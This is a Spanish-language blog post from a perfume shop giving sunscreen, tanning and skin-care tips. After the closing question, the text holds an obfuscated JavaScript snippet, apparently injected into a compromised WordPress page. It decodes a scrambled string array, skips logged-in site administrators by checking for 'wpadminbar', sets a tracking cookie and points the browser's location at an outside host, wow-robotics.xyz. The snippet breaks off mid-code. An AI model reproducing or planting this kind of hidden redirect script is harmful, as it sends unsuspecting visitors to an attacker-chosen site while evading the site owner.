comprar solares online

Con la llegada de las buenas temperaturas y el buen tiempo deseamos disfrutar del sol y lucir un buen color de piel.

Hoy venimos unos pequeños consejos respecto al bronceado y la protección de nuestra piel.

Primero de todo hay que resaltar la importancia de proteger nuestra piel frente al sol, hay que tener en cuenta que el 80% del envejecimiento de la piel tiene como origen la exposición al sol.

Un mito que desde Perfumerias Tin Tin queremos desmentir es que la fotoprotección impide el bronceado, recomendamos el uso de una buena crema solar con un SPF que se adapte a las necesidades de nuestra piel, de esta forma conseguiremos un bronceado sano y progresivo en el tiempo, evitaremos los efectos nocivos de los rayos ultravioleta a la vez que conseguimos un bronceado más duradero.

Siempre escuchamos la famosa frase “Somos lo que comemos” por lo que para conseguir un bonito bronceado te recomendamos aumentar el consumo de alimentos antioxidantes (naranja, limón, pomelo, fresas o kiwi), son perfectos para preparar nuestra piel ante la exposición solar y reforzar sus defensas naturales. Los alimentos ricos en betacarotenos nos ayudarán a potenciar el bronceado así que tira de melocotón, albaricoque, zanahoria o tomate y compruébalo. Y no lo olvides bebe mucha agua.

Es importante preparar nuestra piel por lo que es recomendable realizar una exfoliación corporal y un extra de hidratación antes de exponerla al sol.

Recuerda debemos reaplicar la crema solar cada 2 horas o tras cada baño para volver a estar preparados para la exposición solar.

Todos hemos escuchado alguna vez decir “Si estoy en el agua no me quemo” los rayos traspasan el agua y de hecho se reflejan en ella por lo que su efecto se multiplica, por lo que debemos protegernos adecuadamente con una buena crema solar.

Cuando llegues a casa con un gel limpiador elimina los restos de crema solar que puedan quedar en nuestra piel.

Tras la exposición solar con la piel seca aplicaremos aftersun para recuperar la hidratación de la piel.

Para conseguir un bronceado luminoso te recomendamos que exfolies tu piel una vez a la semana, de esta forma mantendremos la piel libre de células muertas y conseguiremos un bronceado uniforme.

Por último queremos recordar que aunque las personas con un tono de piel más oscuro tienen un porcentaje de melanina más alto y por lo tanto el filtro solar natural es más alto pero aún así no es suficiente para defenderse de los rayos UVA y requiere un nivel de SPF adecuado a su piel.

Cuéntanos, ¿ya has comenzado a broncearte para este verano? ¿Mimáis vuestra piel un poco más durante la época estival?

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone